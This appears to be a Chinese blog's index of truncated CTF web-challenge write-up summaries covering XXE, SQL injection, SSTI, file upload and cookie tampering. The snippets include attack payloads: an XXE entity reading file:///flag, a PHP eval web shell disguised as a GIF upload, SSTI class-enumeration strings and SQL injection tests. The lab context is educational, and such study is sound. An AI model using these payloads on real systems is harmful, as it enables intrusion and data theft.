摘要:[NCTF2019]True XML cookbook 打开环境是之前一道题的登录框 先按原来那道题的payload进行测试,payload和结果如下: <?xml version="1.0" ?> <!DOCTYPE llw [ <!ENTITY file SYSTEM "file:///flag
阅读全文
摘要:[GWCTF 2019]枯燥的抽奖 打开环境,提示猜测完整字符串 在源代码中发现有个check.php文件 打开直接看到源码 <?php #这不是抽奖程序的源代码!不许看! header("Content-Type: text/html;charset=utf-8"); session_start(
阅读全文
摘要:[RCTF2015]EasySQL 打开环境,有一个注册一个登录按钮 这里注册的时候有个坑,邮箱那栏你不能输入@xx.com,否则就会报错不允许的字符 fuzz测试一下发现过滤了不少字符 注册完成后登录 首页的文字没有什么有用的信息,进入帐号发现可以修改密码 如果是正常的账号,此时修改密码不会有任何
阅读全文
摘要:[红明谷CTF 2021]write_shell 打开环境直接给出源代码 <?php error_reporting(0); highlight_file(__FILE__); function check($input){ if(preg_match("/'| |_|php|;|~|\\^|\\+
阅读全文
摘要:[watevrCTF-2019]Cookie Store 打开环境,发现第3个商品是flag cookie,但是要100刀,而我们只有50刀,买不起 点击第1个抓包 将session里的字符解码 看到了我们剩余的钱数是49,改成500,再把post的数据id=0改为id=2用来买我们的3号商品fla
阅读全文
摘要:Less17基于报错的字符型注入 打开环境是一个密码重置页面 在用户名栏输入各种语句都无效,遂审计源码 function check_input($value) { if(!empty($value)) { // truncation (see comments) $value = substr($
阅读全文
摘要:Less11基于post提交的单引号闭合的字符型注入 一、手工注入 1.判断注入点 判断注入类型是否为数字型 1 or 1=1 1 or 1=2 发现页面显示相同,因此不是数字型 判断注入类型是否为字符型 1' or 1=1# 1' or 1=2# 发现1=2页面异常报错,1=1正常。所以是单引号字
阅读全文
摘要:[WUSTCTF2020]CV Maker 打开环境 注册了账号登陆,发现有上传头像的地方,尝试上传文件 可以上传图片马 GIF89a <script language='php'> @eval($_POST['shell']);</script> BP里抓包改为php,得到上传成功路径http:/
阅读全文
摘要:[CSCCTF 2019 Qual]FlaskLight 打开环境 源代码里发现可通过GET方式传入参数 简单验证发现存在SSTI {{''.__class__.__mro__[2].__subclasses__()}} #可以爆出所有的类 编写脚本查找可利用的类 利用subprocess.Pope
阅读全文
摘要:[Zer0pts2020]Can you guess it? 打开环境没有什么特殊的地方,可以点击按钮查看源码 <?php include 'config.php'; // FLAG is defined in config.php if (preg_match('/config\.php\/*$/
阅读全文
摘要:[MRCTF2020]套娃 打开环境发现有张图片显示不出来 查看网页源代码发现部分代码 $query = $_SERVER['QUERY_STRING']; if( substr_count($query, '_') !== 0 || substr_count($query, '%5f') != 0
阅读全文